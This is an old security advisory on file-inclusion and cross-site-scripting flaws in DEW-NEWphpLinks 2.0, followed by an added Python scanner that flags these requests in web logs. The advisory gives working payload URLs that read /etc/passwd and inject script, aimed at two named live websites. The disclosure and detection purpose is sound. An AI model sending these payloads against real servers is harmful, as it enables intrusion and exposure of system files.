DEW-NEWphpLinks 2.0 XSS / LFI

2009-04-28T00:00:00
ID PACKETSTORM:77037
Type packetstorm
Reporter d3v1l
Modified 2009-04-28T00:00:00

Description

                                        
`[~]------------------------------------------------------------------------------------------------  
[~] DEW-NEWphpLinks 2.0 (LFI/XSS) Multiple Remote Vulnerabilities  
[~]  
[~] http://www.dew-code.com  
[~]  
[~]  
[~]  
-----------------------------------------------------------------------------------------------  
[~] Bug found by d3v1l [Avram Marius]  
[~]  
[~] Date: 25.04.2009  
[~]  
[~]  
[~] d3v1l@spoofer.com http://security-sh3ll.com  
[~]  
[~]  
------------------------------------------------------------------------------------------------  
[~] Greetz tO ALL:-  
[~]  
[~] Security-Shell Members (https://security-shell.ws/forum.php) - (http://security-sh3ll.blogspot.com)  
[~]  
[~] milw0rm staff  
[~]-------------------------------------------------------------------------------------------------  
[~] Exploit :- LFI - index.php?show=  
[~]  
[~] http://site.com/index.php?show=../../../../../../etc/passwd%00  
[~]  
[~] Ex :-  
[~]  
[~]  
http://www.customprintedsweatshirts.com/links/index.php?show=../../../../../../etc/passwd%00  
[~]  
http://directory.custom-printed-t-shirts.com/index.php?show=../../../../../../etc/passwd%00  
[~]-------------------------------------------------------------------------------------------------  
[~] XSS on search module works fine on ALL versions  
[~]  
[~] Ex :- XSS - index.php?PID=  
[~]  
[~] http://directory.custom-printed-t-shirts.com/index.php?PID=  
"><script>alert("test")</script>  
[~] http://www.customprintedsweatshirts.com/links/index.php?PID=  
"><script>alert("test")</script>  
[~]-------------------------------------------------------------------------------------------------  
`
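
The two request patterns in this advisory (directory traversal with a `%00` terminator in `show`, and markup in `PID`) can be searched for in web-server access logs. The following Python is an added example, not part of the original advisory; it assumes combined-format logs, and the log lines, client addresses and the benign values `show=add` and `PID=12` are constructed.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (combined format assumed); addresses are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Apr/2009:10:00:01 +0000] "GET /index.php?show=../../../../../../etc/passwd%00 HTTP/1.1" 200 1822',
    '203.0.113.5 - - [28/Apr/2009:10:00:07 +0000] "GET /index.php?PID=%22%3E%3Cscript%3Ealert(%22test%22)%3C/script%3E HTTP/1.1" 200 5120',
    '198.51.100.9 - - [28/Apr/2009:10:01:12 +0000] "GET /index.php?show=add HTTP/1.1" 200 4310',
    '198.51.100.9 - - [28/Apr/2009:10:01:30 +0000] "GET /index.php?PID=12 HTTP/1.1" 200 6102',
    '203.0.113.5 - - [28/Apr/2009:10:02:00 +0000] "GET /links/index.php?show=%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 210',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
MARKUP = re.compile(r'[<>"\']')  # characters needed to break out of an HTML attribute

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input is normalised."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(line):
    """Return sorted findings for one log line; empty list if nothing matches."""
    m = REQUEST.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/index.php"):
        return []
    params = parse_qs(url.query, keep_blank_values=True)
    findings = set()
    for raw in params.get("show", []):
        value = fully_decode(raw)
        if "\x00" in value:
            findings.add("show:null-byte")
        if ".." in value or value.startswith("/"):
            findings.add("show:path-traversal")
    for raw in params.get("PID", []):
        if MARKUP.search(fully_decode(raw)):
            findings.add("PID:markup")
    return sorted(findings)

def scan(lines):
    """Map 1-based line numbers to findings, omitting clean lines."""
    hits = {n: classify(l) for n, l in enumerate(lines, 1)}
    return {n: f for n, f in hits.items() if f}
```

Calling `scan(SAMPLE_LOG)` flags lines 1, 2 and 5 and leaves the two benign requests alone; the repeated decoding is what catches the double-encoded traversal on line 5.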